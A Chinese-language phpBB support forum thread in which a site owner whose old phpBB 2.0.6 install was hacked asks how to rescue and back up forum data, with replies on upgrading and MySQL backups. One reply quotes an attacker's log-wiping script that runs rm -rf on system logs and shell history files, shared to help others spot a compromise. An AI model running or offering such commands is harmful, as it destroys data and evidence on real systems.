[問題] 這樣的狀況可以救出論壇的資料嗎??

phpBB Installation & Usage Support
phpBB 2 安裝於各類型作業平台之問題討論;外掛問題,請到相關版面依發問格式發表!
(發表文章請按照公告格式發表,違者砍文)

版主: 版主管理群

版面規則
本區是討論關於 phpBB 2.0.X 架設安裝上的問題,只要有安裝任何外掛,請到外掛討論相關版面按照公告格式發表。
(發表文章請按照公告格式發表,違者砍文)
主題已鎖定
dgkevin
星球公民
星球公民

[問題] 這樣的狀況可以救出論壇的資料嗎??

文章 dgkevin »

我的站應該被"駭"了,大家嘲笑我吧!!

目前的狀況是,FTP與mail都正常,可是都無法開啟網頁。我們沒有高竿的網管,所以決定將網站遷移至國外租用虛擬主機,可能在安全與管理上會方便一點。

網頁資料的部分,我們都有備份。可是比較麻煩的部分就是論壇了,我目前連 phpmyadmin 都無法進入,請教一下:
1. 我該如何備份phpbb論壇的資料?
2. 是不是可以把論壇目錄下檔案都複製下來,再重新上傳 (目前的 ftp 可以使用)
3. 會員的資料要如備份,跟論壇資料一樣嗎?

額外的問題,想聽聽看各位的建議:
1. 我若是找稍具規模一點的虛擬主機的公司,在安全上會比較好嗎? 除了費用外,有沒有什麼優缺點?

感謝

架設主機︰Linux 版本不詳\r
上網方式:Hinet ADSL (雙向512K)
安裝程式:Apache + php + MySql (使用蕃薯網的ramdisk架站的)
phpBB2 版本: phpBB 2.0.6
babycity
星球公民
星球公民

文章 babycity »

據我所知,phpbb2.13以下的版本都有漏洞,會被駭,應該升級到2.0.13就比較安全了,你被駭應該是版本還在2.0.13吧...
其它我就不清楚了,不能幫你解答
bebe2803
星球公民
星球公民

文章 bebe2803 »

即是, 整個 DATABASE 的 BACKUP 吧... @@ 有沒有一些可以連的上 DB 的程式 ?
怨念公社

phpBB 2.0.17, 8+1 個 template, 70+ mod...
dgkevin
星球公民
星球公民

文章 dgkevin »

謝謝回覆!!
我看過竹貓內相關的文章,好像沒有跟我類似的情況。
我再重複一下,是不是在2.0.13前的版本,安全性的漏洞僅會影響到phpbb,而不會去影響到其他server上像網頁的功能。
因為我的error_log都被刪掉了,所以朋友判斷應該不是phpbb上所引起的問題。

謝謝
我是傾聽我心唷
星球普通子民
星球普通子民

文章 我是傾聽我心唷 »

看一下跟目錄底下有沒有類似log.pl檔案

內容大概是\r

代碼: 選擇全部

#!/usr/bin/perl
rm -rf /var/log
rm -rf /var/adm
rm -rf /var/apache/log
rm -rf $HISTFILE
find / -name .bash_history -exec rm -rf {} \;
find / -name .bash_logout -exec rm -rf {} \;
find / -name log* -exec rm -rf {} \;
find / -name *.log -exec rm -rf {} \;
^^y 我也被駭了~*
不過奇怪的是,檔案屬性是644 而擁有者與群組都是root
查了/etc/passwd 裡頭並沒有新增使用者的情況。
yoyoweb_1
星球普通子民
星球普通子民

文章 yoyoweb_1 »

當然可以囉!!我的伺服器不但被駭最慘的是所有的帳密全部都被改掉,ftp無法上去\r
連工程師都無法進入,屋漏偏逢連夜雨,最後甚至連硬碟都壞軌.... :cry:
我無法備份檔案資料,好在我的資料庫是另行自己建構[也不知道當時為啥可以自行
建在自己的檔案夾裡>"<]因此我把資料庫備份後,就請工程師把整台伺服器搬去\r
修理了,我只知道他後來用暴力把資料複製回來,可是資料庫好在我自己備份,因為\r
連他都無法把資料庫資料拿到手....
我再三考慮後,決定重新架站,把phpbb的版本改成最新的2.0.17,當時因為懶\r
所以一直沒有升級 保持在2.0.11
然後乖乖慢慢把之前改過的外掛通通架回去\r
這得感謝以前我有好習慣,每個外掛前面都有安裝順序,因此把所有外掛裝好後,
資料庫一邊比對一邊匯入[千萬別直接整筆匯入,版本會有差別喔!!]
然後,我的論壇就復活了 :oops:
還讓當時怎樣安裝都有亂碼的網站推薦精華板外掛變成正常的 :mrgreen:
這是意外的收穫
奉勸各位,網站被駭被惡搞是常有的事情,別以為只是自家小網站罷了!!
就是有這樣無聊的人物會來光顧,因此請務必在架好網站後先備份檔案
然後有控就把資料庫備份一下,經常備份,是讓您的損失降到最低點的最好保障
大家都加油囉!!
這就是我的伺服器被黑辛酸史 8-)
有些問題,並非不存在,只是尚未發生.....
頭像
brentsu
星球公民
星球公民
聯繫:

文章 brentsu »

【網站被駭被惡搞是常有的事情】是真的嗎??

可以請駭客也來駭我一下~~不然我家都沒人~~嗚~~~
※架設伺服器主機:Mac mini 1.5GHz, 1GB RAM x 三部
※架設主機作業系統:Mac OS X Server 10.6.6 Snow Leopard
※我的上網方式:固定制 ADSL 16M/8M、6 IP
※安裝的伺服器:Apache + php 5 + MySQL 5
※我的 phpBB2 版本:phpBB 3.0.x UTF-8 版
※BNW會議室網址: http://www.bnw.com.tw/conference/
小竹子
竹貓星球大統領
竹貓星球大統領
聯繫:

文章 小竹子 »

可以裝 2.0.3 或是 2.0.15 開機兩三天就有的你受了 :oops:
brentsu 寫:【網站被駭被惡搞是常有的事情】是真的嗎??

可以請駭客也來駭我一下~~不然我家都沒人~~嗚~~~
注意事項:
●phpBB 架設相關問題請到 + phpBB 3.0.x 討論區發表!
●都沒有你要的答案嗎??>>點這裡<<搜尋一下吧!
●請使用>>標準的發文格式<<發表問題!
●竹貓星球並非政治團體代言人,請不要在竹貓討論政治議題,也不要認為竹貓是偏向任何一方政治團體,竹貓愛的是台灣這片生長的土地,過於泛政治化文章請來信告知移除!
●關於 phpBB 使用問題請在版面發問,私人訊息提供其他不相干或是隱私的事情聯絡之用。
●所有市面上的免費空間皆非竹貓管轄,請勿來信詢問,請直接與該免費空間連絡。
ws108805
星球公民
星球公民

文章 ws108805 »

請問一下,網站被駭,要是連管理人帳號也被刪除,那要如何救回?
再次登入?
謝謝
sashow
星球普通子民
星球普通子民

Re: [問題] 這樣的狀況可以救出論壇的資料嗎??

文章 sashow »

dgkevin 寫:網頁資料的部分,我們都有備份。可是比較麻煩的部分就是論壇了,我目前連 phpmyadmin 都無法進入,請教一下:
1. 我該如何備份phpbb論壇的資料?
2. 是不是可以把論壇目錄下檔案都複製下來,再重新上傳 (目前的 ftp 可以使用)
3. 會員的資料要如備份,跟論壇資料一樣嗎?
我也是新手, 所以想跟進問這個問題, 請各位指教:
用的是MYSQL + phpBBv.2.0.15

我在國外的收費伺服器上架了我的網站, 而論壇裝放在站內一個叫phpBB/ 的資料夾內; 如果我想定期把論壇及資料備份, 我是否只要透過ftp 把phpBB/ 的資料夾整個抄下來到我的硬碟便行? (有違漏資料嗎?); 而當萬一需要還原, 是否只要把這個資料夾上傳至伺服器便行?
如果不是, 我漏了甚麼呢? 要怎麼做才行?
有像這些只要找出相關的資料夾複製抄下... 便行的簡單備份方法嗎? (我讀到其他的文章, 方法都很深奧複雜, 有點害怕)
夢幻LUGIA
竹貓忠實會員
竹貓忠實會員

文章 夢幻LUGIA »

sashow 寫: 我在國外的收費伺服器上架了我的網站, 而論壇裝放在站內一個叫phpBB/ 的資料夾內; 如果我想定期把論壇及資料備份, 我是否只要透過ftp 把phpBB/ 的資料夾整個抄下來到我的硬碟便行? (有違漏資料嗎?); 而當萬一需要還原, 是否只要把這個資料夾上傳至伺服器便行?
如果不是, 我漏了甚麼呢? 要怎麼做才行?
有像這些只要找出相關的資料夾複製抄下... 便行的簡單備份方法嗎? (我讀到其他的文章, 方法都很深奧複雜, 有點害怕)
文章的資料都存於MySQL內,你可以利用後台的備份功能\r
(正常情況下,還原也一樣)

你的做法可以備份論壇的程式,但不是文章資料
但由於論壇程式本身不會改變,故不需經常備份\r
(除非你常裝外掛或是遭駭客盯上之類)
sashow
星球普通子民
星球普通子民

文章 sashow »

夢幻LUGIA 寫:文章的資料都存於MySQL內,你可以利用後台的備份功能\r
(正常情況下,還原也一樣)
但好像在其他的帖中曾讀過超過了2MB容量的文章資料庫用後台的備份功能都不能成功備份還原... 真的嗎??
大家可否教教我那該如何做備份和還原好呢? 有直接簡單的步驟嗎? (曾爬過文但都看不懂那些複雜的方法... 請見諒)
頭像
jwxie
竹貓忠實會員
竹貓忠實會員
聯繫:

...

文章 jwxie »

當但夢大, 他不是已經給人駭掉資料庫啦嗎=="?

如果你的資料庫真的那麼幸運給人駭人 :oops:
那只有一個方法.......

砍唄=.=

不過不會那麼容易吧= =?

目前本人帳號嚴重地被盜用!MSN已經被盜!

想問個問題並不打擾, 但沒有發文格式, 其他人不能知道你的情況!
請尊守竹貓各區裡的發文格式, 謝謝合作!
[必看]請配合發問格式及明確主題發問(04 02/16更新) phpBB!
所有新手必看的
[教學]認識、安裝和參考PHPBB的新手基本教學通
PS:感謝各位大大的幫助和教導^^
Q168.net空間技術交流

個人小品(Blog)My phpBB-Blog免費空間討論區
頭像
kkt
竹貓忠實會員
竹貓忠實會員
聯繫:

文章 kkt »

To: sashow, 在後台作完整備份可以呀, 不是 2mb 吧, 我超過100mb 也一樣的下載, 需要時把它還原即可. 當然更換主機要更改設定啦.

.
舊站台經已結朿了, 學生們可到遊戲站玩玩 Flash Game (不必註冊) 免費 Flash Game
在此學到很多架站知識, 永遠多謝:
心靈捕手老師, ~倉木麻衣~, 依夢兒 及 神川小羽各位大大相助
主題已鎖定

回到「phpBB 2 安裝與使用」